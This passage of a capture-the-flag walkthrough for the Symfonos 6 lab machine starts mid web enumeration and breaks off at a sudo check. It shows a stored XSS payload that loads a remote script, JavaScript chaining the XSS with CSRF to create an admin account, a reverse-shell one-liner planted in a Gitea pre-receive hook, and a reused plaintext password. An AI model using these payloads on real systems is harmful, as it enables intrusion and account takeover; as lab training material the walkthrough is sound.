+ http://192.168.103.18/flyspray/scripts/admin.php (CODE:200|SIZE:33)                                                                                    
+ http://192.168.103.18/flyspray/scripts/index.php (CODE:200|SIZE:33)                                                                                    
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/posts/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/posts/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/admin.php (CODE:403|SIZE:237)                                                                          
+ http://192.168.103.18/flyspray/plugins/dokuwiki/conf (CODE:403|SIZE:232)                                                                               
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/img/                                                                                      
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/inc/                                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/index.php (CODE:403|SIZE:237)                                                                          
+ http://192.168.103.18/flyspray/plugins/dokuwiki/info.php (CODE:403|SIZE:236)                                                                           
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/                                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/phpinfo.php (CODE:403|SIZE:239)                                                                        
+ http://192.168.103.18/flyspray/plugins/dokuwiki/xmlrpc.php (CODE:403|SIZE:238)                                                                         
+ http://192.168.103.18/flyspray/plugins/dokuwiki/xmlrpc_server.php (CODE:403|SIZE:245)                                                                  
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/img/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/admin.php (CODE:403|SIZE:241)                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/index.php (CODE:403|SIZE:241)                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/info.php (CODE:403|SIZE:240)                                                                       
+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/phpinfo.php (CODE:403|SIZE:243)                                                                    
+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/xmlrpc.php (CODE:403|SIZE:242)                                                                     
+ http://192.168.103.18/flyspray/plugins/dokuwiki/img/xmlrpc_server.php (CODE:403|SIZE:249)                                                              
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/inc/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/admin.php (CODE:403|SIZE:241)                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/index.php (CODE:403|SIZE:241)                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/info.php (CODE:403|SIZE:240)                                                                       
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/phpinfo.php (CODE:403|SIZE:243)                                                                    
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/xmlrpc.php (CODE:403|SIZE:242)                                                                     
+ http://192.168.103.18/flyspray/plugins/dokuwiki/inc/xmlrpc_server.php (CODE:403|SIZE:249)                                                              
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/admin.php (CODE:403|SIZE:241)                                                                      
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/                                                                                  
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/                                                                               
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/index.php (CODE:403|SIZE:241)                                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/info.php (CODE:403|SIZE:240)                                                                       
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/phpinfo.php (CODE:403|SIZE:243)                                                                    
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/                                                                              
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/xmlrpc.php (CODE:403|SIZE:242)                                                                     
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/xmlrpc_server.php (CODE:403|SIZE:249)                                                              
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/admin.php (CODE:403|SIZE:245)                                                                  
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/index.php (CODE:403|SIZE:245)                                                                  
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/info.php (CODE:403|SIZE:244)                                                                   
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/phpinfo.php (CODE:403|SIZE:247)                                                                
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/xmlrpc.php (CODE:403|SIZE:246)                                                                 
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/exe/xmlrpc_server.php (CODE:403|SIZE:253)                                                          
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/admin.php (CODE:403|SIZE:248)                                                               
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/index.php (CODE:403|SIZE:248)                                                               
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/info.php (CODE:403|SIZE:247)                                                                
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/phpinfo.php (CODE:403|SIZE:250)                                                             
==> DIRECTORY: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/                                                                       
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/xmlrpc.php (CODE:403|SIZE:249)                                                              
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/xmlrpc_server.php (CODE:403|SIZE:256)                                                       
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/admin.php (CODE:403|SIZE:249)                                                              
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/index.php (CODE:403|SIZE:249)                                                              
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/info.php (CODE:403|SIZE:248)                                                               
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/phpinfo.php (CODE:403|SIZE:251)                                                            
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/xmlrpc.php (CODE:403|SIZE:250)                                                             
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/plugins/xmlrpc_server.php (CODE:403|SIZE:257)                                                      
                                                                                                                                                         
---- Entering directory: http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/ ----
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/admin.php (CODE:403|SIZE:256)                                                       
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/index.php (CODE:403|SIZE:256)                                                       
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/info.php (CODE:403|SIZE:255)                                                        
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/phpinfo.php (CODE:403|SIZE:258)                                                     
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/xmlrpc.php (CODE:403|SIZE:257)                                                      
+ http://192.168.103.18/flyspray/plugins/dokuwiki/lib/images/smileys/xmlrpc_server.php (CODE:403|SIZE:264)                                               
-----------------
END_TIME: Sun Dec  1 13:22:42 2024
DOWNLOADED: 73792 - FOUND: 68
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Directory enumeration output is read by status code: each entry's HTTP response tells us whether a path exists and whether we are allowed to reach it.

  • index.html returns 200 OK: it is the homepage we already viewed in the browser.
  • flyspray/ and posts/ return 301 Moved Permanently. On Apache a 301 for a bare directory name is normally just the server adding the trailing slash (a request for /flyspray is redirected to /flyspray/), so it confirms the directory exists rather than pointing somewhere else. Both look like separate applications under the web root and deserve a closer look.
  • The long run of 403 Forbidden entries under flyspray/plugins/dokuwiki/ is dirb re-testing the same file names (admin.php, index.php, phpinfo.php, ...) in every subdirectory it finds; the identical code and near-identical sizes indicate one blanket deny rule for that tree, not individual findings.

To gather more information, let’s explore these paths in a browser. 

Visiting the /posts webpage reveals a custom blog featuring the following description:

The warrior Achilles is one of the great heroes of Greek mythology. According to legend, Achilles was extraordinarily strong, courageous, and loyal, but he had one vulnerability Achilles heel. Homer's epic poem The Iliad tells the story of his adventures during the last year of the Trojan War.

At first glance, this content does not provide direct clues. However, when compared to the homepage, it appears to be a textual description of the image displayed there. This connection may hold significance, so further analysis of the content and its context is recommended.


Inspecting the Flyspray Web Dashboard

Now, let's inspect the flyspray/ page.

On visiting it, the page identifies itself as the web interface of Flyspray, a bug and task tracking system.

Flyspray - Bug Tracking System

Flyspray is an open-source bug tracking system designed for simplicity and ease of use. It provides an efficient way to manage project issues and collaborate with team members effectively.


An exposed bug tracker is worth attention for two reasons: older versions have publicly documented vulnerabilities, and the tasks themselves frequently contain internal details such as hostnames or credentials.

Before going deeper, we enumerate what the Flyspray interface exposes without logging in.

The landing page shows three main tabs:

  • Task List
  • Overview
  • Roadmap

This Task list tab shows a single task with the following details:

  • Category: Backend / Core.
  • Task Type: Bug Report.
  • Priority and Severity: Very Low.
  • Summary: Bug report.
  • Status: New

Clicking on the task provides additional details, which could be useful. 

In the comment section below, there is a comment posted by "Mr. Super User" , which might provide further clues.


The other two tabs:

The Overview tab shows general information about the project, including a summary of Symfonos bugs with two open tasks. The Task List showed only one task to us as an anonymous visitor, so the second is presumably restricted to logged-in or privileged users; worth remembering once we have an account.

The Roadmap tab is empty, with no planned tasks or milestones.

There is also a Login button in the top-right corner, indicating that registered users, and possibly administrators, get more functionality.

Clicking it opens a login form requiring a username and password, along with an option to register a new account.


At the bottom-right corner of the interface, the text "Powered by Flyspray" is displayed.

This confirms the product but not its version, so the exact release will have to be inferred another way; it is the version, not the product name, that turns into a list of known vulnerabilities.


Exploitation

Looking for Potential Vulnerabilities

Although the specific version of Flyspray is not directly exposed on the interface, a quick search on ExploitDB reveals potential vulnerabilities. Using the command: 

┌──(kali㉿kali)-[~]
└─$ searchsploit flyspray               
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities                                                            | php/webapps/26400.txt
FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution                                                           | php/webapps/1494.php
Flyspray 0.9.9 - Information Disclosure/HTML Injection / Cross-Site Scripting                                           | php/webapps/31326.txt
Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities                                                          | php/webapps/30891.txt
Flyspray 0.9.9.6 - Cross-Site Request Forgery                                                                           | php/webapps/18468.html
FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery                                                    | php/webapps/41918.txt
Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure                                                           | php/webapps/2852.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

Of these, the sixth entry, for Flyspray 1.0-rc4, is the most promising: it is the most recent release listed, and the advisory chains a stored XSS with CSRF, which is enough to create an account from an administrator's session. The target's version is unknown, so the next step is to test whether the XSS actually works rather than assume it does.


Exploiting Flyspray (Manually)

Copy the advisory into the working directory with searchsploit -m:

┌──(kali㉿kali)-[~]
└─$ searchsploit -m php/webapps/41918.txt
  Exploit: FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery
      URL: https://www.exploit-db.com/exploits/41918
     Path: /usr/share/exploitdb/exploits/php/webapps/41918.txt
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/41918.txt                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Now that it is saved as a text file, let's open it and examine its contents.

The file describes the vulnerability and how the pieces chain together.

Flyspray 1.0-rc4 stores profile fields such as Real Name without output encoding, giving a stored XSS (Cross-Site Scripting) that fires wherever the name is rendered. The administrative forms are protected by a CSRF (Cross-Site Request Forgery) token, so a plain cross-site form post cannot create a user on its own. JavaScript executing inside an administrator's session can, however: it fetches the admin page, reads the token out of it, and submits the new-user form with that token and the admin's cookies. That is the XSS-to-CSRF chain the advisory describes, and it ends with a new account in the admin group.

With that understood, here is how to put it to use.


Register a New User and Verify Whether It Is Vulnerable to XSS

To test for the XSS, the first step is to register a new user.

1. On the login page, click the Register button.

2. A registration form appears; fill it out as follows.

  • In the Username field, enter a username of your choice.
  • In the Password field, enter a password. For this demonstration, I'll use 12345678.
  • In the Real Name field, insert a basic XSS payload that pops an alert reading "hello" when it executes.
  • Submit the form to register the user.

3. After successful registration, log in with the new credentials.

4. Navigate to the user profile page.

5. The profile page pops an alert with "hello", which confirms the Real Name field is rendered without encoding: the application is vulnerable to stored XSS.

Now that Flyspray is confirmed vulnerable, we serve the exploit script from our machine and change the Real Name to a script tag that loads it. When the name is rendered in an administrator's session, that script fetches the CSRF token and submits the form that creates a new admin.


Serve the exploit script and feed it to the admin account

1. First, create a file containing the exploit code.

The script is in the downloaded text file. Copy it into a text editor and save it as exploit.js.

2. Next, host the script with a simple HTTP server. Python will do: python3 -m http.server

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

3. Deploy the payload.

  • Change the Real Name field of the logged-in user to the following:

"><script src="http://<YOUR_SERVER_IP>:8000/exploit.js"></script>

  • Replace <YOUR_SERVER_IP> with the address of the machine running the HTTP server; the target must be able to reach it, which is why both VMs sit on the same host-only network.

  • The name is reflected wherever the user is shown: the profile page and any task comments the user has posted.

4. Opening your own profile page loads exploit.js from your server and proves the injection is in place, but a request from your own browser is not the one that matters. The CSRF step needs the administrator's session cookies, so the script has to execute in the admin's browser.

5. Watch the log of the Python HTTP server. The request to look for is a GET for /exploit.js that you did not make yourself: if it originates from the target's address, the page was rendered there, in a session on the target side.

The logs should confirm that the script was accessed, which indicates it was triggered correctly.

6. To make that happen, post a comment on the open task (something as simple as "Help!") before updating the Real Name. The comment puts your display name, and with it the script tag, on the task page that an administrator reviewing the report will load.
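The chain just described, as an added example rather than the exploit-db script itself, which is not reproduced here. It is not Flyspray's code or the advisory's code: the admin page path (index.php?do=admin&area=newuser), the hidden field name csrftoken, the form field names and the group id are all assumptions standing in for whatever the real form uses, and the fake fetch is a constructed stand-in for the browser so the logic can be run offline.

```javascript
// Added example (not the exploit-db script): the XSS-to-CSRF chain from
// the Flyspray advisory, split into functions that run without a browser.
// Field names, the admin page path and the group id are assumptions
// standing in for the real Flyspray form, not copied from it.

// Pull the anti-CSRF token out of an HTML page. The hidden input name
// "csrftoken" is an assumption; adjust it to what the target form uses.
function extractCsrfToken(html) {
  const re = /<input[^>]*name=["']csrftoken["'][^>]*value=["']([^"']+)["']/i;
  const reSwapped = /<input[^>]*value=["']([^"']+)["'][^>]*name=["']csrftoken["']/i;
  const m = html.match(re) || html.match(reSwapped);
  return m ? m[1] : null;
}

// Body of the "create user" POST. Every field name here is hypothetical.
function buildNewUserBody(token, username, password) {
  return new URLSearchParams({
    action: 'admin.newuser',
    user_name: username,
    user_pass: password,
    user_pass2: password,
    real_name: username,
    email_address: `${username}@example.invalid`,
    global_group: '1', // assumed id of the Admin group
    csrftoken: token,
  }).toString();
}

// The chain itself. When this runs as the injected payload, `fetchFn` is
// the browser's fetch(): both requests are same-origin, so the victim's
// cookies ride along. Injected here so the logic is testable offline.
async function createAdminViaCsrf(fetchFn, base, username, password) {
  const adminPage = await fetchFn(`${base}/index.php?do=admin&area=newuser`, {
    credentials: 'include',
  });
  const token = extractCsrfToken(await adminPage.text());
  if (!token) {
    // No token means we did not get the admin form: the viewer is not an
    // administrator, so posting the form would only leave noise in the logs.
    return { created: false, reason: 'no csrf token (viewer is not admin)' };
  }
  const resp = await fetchFn(`${base}/index.php`, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildNewUserBody(token, username, password),
  });
  return { created: resp.status === 200, reason: `HTTP ${resp.status}` };
}

// Constructed stand-in for fetch(): a victim whose admin page carries the
// given token (or, with token = null, a non-admin who sees a denial page).
// Records every POST so the chain can be checked without a server.
function makeFakeFetch(token, sent) {
  return async (url, opts = {}) => {
    if (opts.method === 'POST') {
      sent.push({ url, body: opts.body });
      return { status: 200, text: async () => 'user created' };
    }
    const html = token
      ? `<form><input type="hidden" name="csrftoken" value="${token}"></form>`
      : '<p>Permission denied</p>';
    return { status: 200, text: async () => html };
  };
}

// Demo against the fake victim.
if (typeof require !== 'undefined' && require.main === module) {
  const sent = [];
  createAdminViaCsrf(makeFakeFetch('deadbeef', sent), 'http://target/flyspray', 'hacker', '12345678')
    .then((result) => console.log(result, sent));
}
```

Run it with node; the demo prints the result against the fake victim. In the real payload `fetchFn` is the page's own fetch, so the two requests are same-origin and carry the administrator's cookies, which is the whole reason the script must run in the admin's browser rather than yours. The early return when no token is found is the useful check: a non-admin victim never sees the form, and posting anyway would only create log noise.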


Re-Login with newly created Credentials

Once confirmed, log out and log back in with the account the script created:

  • Username: hacker
  • Password: 12345678

With that login working, we check whether the new account can see anything the anonymous view could not. The dashboard panel is the place to look.

Within the dashboard there is a bug report with ID 2, the task that was counted in the Overview but hidden from the Task List earlier. Its description contains a hint with a set of credentials, which may grant access to other services on the machine.

With these credentials in hand, we try to gain a foothold on the target system.


Foothold

Access Via SSH

To gain a foothold with the discovered credentials, we first try SSH.

┌──(kali㉿kali)-[~]
└─$ ssh achilles@192.168.103.18
The authenticity of host '192.168.103.18 (192.168.103.18)' can't be established.
ED25519 key fingerprint is SHA256:MCN41cqZbJGd911b9OVaVYAdycWmYvB/Vbm91gBlfpY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.103.18' (ED25519) to the list of known hosts.
achilles@192.168.103.18: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

┌──(kali㉿kali)-[~]
└─$ 

No password prompt appears: the server only offers the publickey and GSSAPI methods, so password authentication is disabled for SSH, which is a sensible hardening choice. The credentials have not been proven wrong, only untestable here, and may still be valid elsewhere.

Re-examining the hint reveals a reference to Gitea, indicating that it is set up internally for Git hosting.



But, what is Gitea?

Gitea is a lightweight, self-hosted Git service similar to GitHub, offering features such as:

  • Repositories for version control
  • Issue tracking for task management
  • Code review for collaborative development

In this scenario, Gitea might be accessible internally and could contain sensitive information or misconfigurations that can be exploited.

The focus now shifts to Enumerating Gitea for potential vulnerabilities or misconfigurations.


Enumerate Gitea

The earlier Nmap scan showed port 3000 open with an HTTP service nmap could not name, but the fingerprint strings give it away: the session cookie is called i_like_gitea and the page title is Symfonos6. That is the Gitea instance the hint refers to.

3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=49fd5825fad5aa8d; Path=/; HttpOnly
|     Set-Cookie: _csrf=Pk916asD1Xz4WaGVF4mpyjccdr06MTczMzA3NzAzNDk2ODc3OTI3NA; Path=/; Expires=Mon, 02 Dec 2024 18:17:14 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 18:17:15 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|     console.info('ServiceWorker registration successful with scope: ', registrat
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=82b3bbaff5fa3556; Path=/; HttpOnly
|     Set-Cookie: _csrf=aoXQJDIzGFtpa492o1ciqnAr6Lo6MTczMzA3NzA0MDE3MTgxMzQ2OA; Path=/; Expires=Mon, 02 Dec 2024 18:17:20 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 18:17:20 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|_    console.info('ServiceWorker registration successful

Let's open it in the web browser.

Previously, we found credentials that can be tried against Gitea:

  • Username: Achilles
  • Password: h2sBr9gryBunKdF9

Click Sign In to reach Gitea's login page and enter them.

The login succeeds and lands on Achilles' dashboard.

Now, let's inspect it.


Inspect Gitea Dashboard

Upon logging in as the user Achilles, two repositories are noted:

  1. Symfonos-blog
  2. Symfonos-API

Inspect the repo symfonos-blog.

Judging by its contents, this repository holds the source of the blog served at http://192.168.103.18.


Inspect the Repo: symfonos-api

The .env file in this repository describes a custom REST API application running on port 5000. Files like .env are where applications keep secrets and connection strings, so its contents are worth noting for later.

The repositories tell us about the target's architecture, but they do not by themselves offer a path to further access.


Exploiting the Gitea Service (Manually)

To proceed, we look for exploits targeting Gitea itself.

┌──(kali㉿kali)-[~]
└─$ searchsploit gitea  
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authenticated)                                                                    | multiple/webapps/49571.py
Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)                                                                 | multiple/webapps/51009.rb
Gitea 1.4.0 - Remote Code Execution                                                                                     | multiple/webapps/44996.py
Gitea 1.7.5 - Remote Code Execution                                                                                     | multiple/webapps/49383.py
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

One candidate fits our situation, since we already hold a valid account:

Gitea 1.12.5 - Remote Code Execution (Authenticated)

https://www.exploit-db.com/exploits/49571

This Python exploit lets an authenticated user run arbitrary commands on the server by writing a custom Git hook through the web interface and then pushing a commit to trigger it. Gitea prints its version in the page footer by default, so check that the target is 1.12.5 or older before relying on it.

Reading the script shows the steps are simple enough to perform by hand in the browser, which is what we do next to obtain a reverse shell.

There are two ways to achieve this —

  • Modifying an existing repository or 
  • By creating a new one. 

Here, we use the symfonos-blog repository to establish the reverse shell.

First, start a Netcat listener to catch the callback:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

Open the repository, go to Settings, and under the settings menu select Git Hooks.

Git hooks are scripts the server runs at fixed points of a push. Gitea lets suitably privileged users edit them in the browser, and whatever is written there runs as the system account Gitea itself runs under. We edit the pre-receive hook by clicking its edit icon.

Inject the reverse shell payload into the hook:

bash -c 'bash -i>& /dev/tcp/<Attacking_IP>/<Listening_PORT> 0>&1'

  • <Attacking_IP>: the IP address of the listening machine
  • <Listening_PORT>: the port Netcat is listening on

Once the payload is added, click Update Hook to save the changes.

Nothing happens yet: a pre-receive hook runs only when the repository receives a push. Editing a file through the web interface makes Gitea commit and push on the server side, which is enough to fire it.

In the symfonos-blog repository, open index.php, click the edit icon, and append a PHP comment at the end of the file so the site keeps working.

Add a commit message describing the change and, with the Netcat listener still running, click Commit Changes. The hook fires during the push and connects back to the listener:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.103.3] from (UNKNOWN) [192.168.103.18] 37794
bash: no job control in this shell
[git@symfonos6 symfonos-blog.git]$

Here, we can see in the listener that we have successfully received a connection and gained a foothold on the target system. 


Enumerate the Session

Now, let's enumerate the session to see what this account can reach and how to extend it.

First, confirm the user context with whoami; it tells us which account the hook ran as and therefore what our privileges are.

[git@symfonos6 symfonos-blog.git]$ whoami
whoami
git
[git@symfonos6 symfonos-blog.git]$

Currently, we have initial access as the git user, which provides limited permissions. This means we need to perform privilege escalation or lateral movement to achieve full control over the target system.

Now, let's search for user flags.   Navigate to the git user’s home directory to check for any user flag. 

[git@symfonos6 symfonos-blog.git]$ cd
cd
[git@symfonos6 ~]$ ls -al
ls -al
total 20
drwx------  4 git  git  139 Dec  1 14:46 .
drwxr-xr-x. 4 root root  33 Apr  2  2020 ..
-rw-------  1 git  git   33 Dec  1 14:46 .bash_history
-rw-r--r--  1 git  git   18 Apr 10  2018 .bash_logout
-rw-r--r--  1 git  git  193 Apr 10  2018 .bash_profile
-rw-r--r--  1 git  git  231 Apr 10  2018 .bashrc
-rw-r--r--  1 git  git   73 Dec  1 14:09 .gitconfig
drwx------  2 git  git   29 Apr  2  2020 .ssh
drwxr-xr-x  3 git  git   22 Apr  2  2020 gitea-repositories
[git@symfonos6 ~]$

However, no flag is found for this user, indicating that there might be other users on the system, or we may need to enumerate further to gain higher privileges.


Privilege Escalation

Enumerate System Information

In the privilege escalation phase, the goal is deeper enumeration: misconfigurations, exploitable software, or overlooked permissions that let us reach root or another privileged user. That means looking at file permissions, SUID binaries, running services, and scheduled tasks.

The reverse shell runs as a low-privileged user without a terminal, which limits what we can read and run.

First, check whether the git user has any sudo rights:

[git@symfonos6 ~]$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
[git@symfonos6 ~]$ 

This does not mean the git user lacks sudo rights. sudo wants to prompt for git's password and cannot do so without a tty; with a pty (the Python trick used further down) it would prompt, but we do not know git's password either. So sudo tells us nothing yet, and the next step is to look for other users.


Escalate to user, Achilles

Let's list the /home directory.

[git@symfonos6 ~]$ cd /home
cd /home                                                                                                                                                  
[git@symfonos6 home]$ ls -al                                                                                                                              
ls -al                                                                                                                                                    
total 0                                                                                                                                                   
drwxr-xr-x.  4 root     root      33 Apr  2  2020 .                                                                                                       
dr-xr-xr-x. 17 root     root     224 Mar 30  2020 ..                                                                                                      
drwx------   6 achilles achilles 171 Apr  2  2020 achilles                                                                                                
drwx------   4 git      git      139 Dec  1 14:46 git                                                                                                     
[git@symfonos6 home]$

There is a second home directory, achilles, so a user account with that name exists.

Recall the credentials discovered in Flyspray task 2.

We tried them over SSH and failed, but only because the server accepts nothing except public-key (and GSSAPI) authentication; the password itself was never tested.

Instead of SSH, let's switch to the achilles user locally with su and the discovered password.

[git@symfonos6 home]$ su achilles                                                                                                                         
su achilles                                                                                                                                               
Password: h2sBr9gryBunKdF9

The password is accepted and we are now the achilles user.

whoami
achilles

The shell, however, shows no prompt: su is running inside a reverse shell that is not attached to a terminal. Let's check whether Python is available so we can spawn a proper pty and get a usable shell.

python --version                                                                                                                                          
Python 2.7.5                                                                                                                                              
python -c "import pty;pty.spawn('/bin/bash')"                                                                                                             
[achilles@symfonos6 home]$

Now that we have a proper shell, move to achilles' home directory and look for the user flag.

[achilles@symfonos6 home]$ cd                                                                                                                             
cd                                                                                                                                                        
[achilles@symfonos6 ~]$ ls -al                                                                                                                            
ls -al                                                                                                                                                    
total 16                                                                                                                                                  
drwx------  6 achilles achilles 171 Apr  2  2020 .                                                                                                        
drwxr-xr-x. 4 root     root      33 Apr  2  2020 ..                                                                                                       
lrwxrwxrwx  1 root     root       9 Apr  2  2020 .bash_history -> /dev/null                                                                               
-rw-r--r--  1 achilles achilles  18 Apr 10  2018 .bash_logout                                                                                             
-rw-r--r--  1 achilles achilles 229 Apr  2  2020 .bash_profile                                                                                            
-rw-r--r--  1 achilles achilles 231 Apr 10  2018 .bashrc                                                                                                  
drwxrwxr-x  3 achilles achilles  22 Apr  2  2020 .cache                                                                                                   
-rw-rw-r--  1 achilles achilles  57 Apr  2  2020 .gitconfig                                                                                               
lrwxrwxrwx  1 root     root       9 Apr  2  2020 .mysql_history -> /dev/null                                                                              
drwxrw----  3 achilles achilles  19 Apr  2  2020 .pki                                                                                                     
drwx------  2 achilles achilles  61 Apr  3  2020 .ssh                                                                                                     
drwxrwxr-x  5 achilles achilles  39 Apr  2  2020 go                                                                                                       
[achilles@symfonos6 ~]$ 

Unfortunately, no flag is found here either. The final step is to gain superuser privileges, which will allow us to access the root shell.

To proceed, let's check if the Achilles user has any special sudo privileges by running the sudo -l command.

[achilles@symfonos6 ~]$ sudo -l                                                                                                                           
sudo -l                                                                                                                                                   
Matching Defaults entries for achilles on symfonos6:                                                                                                      
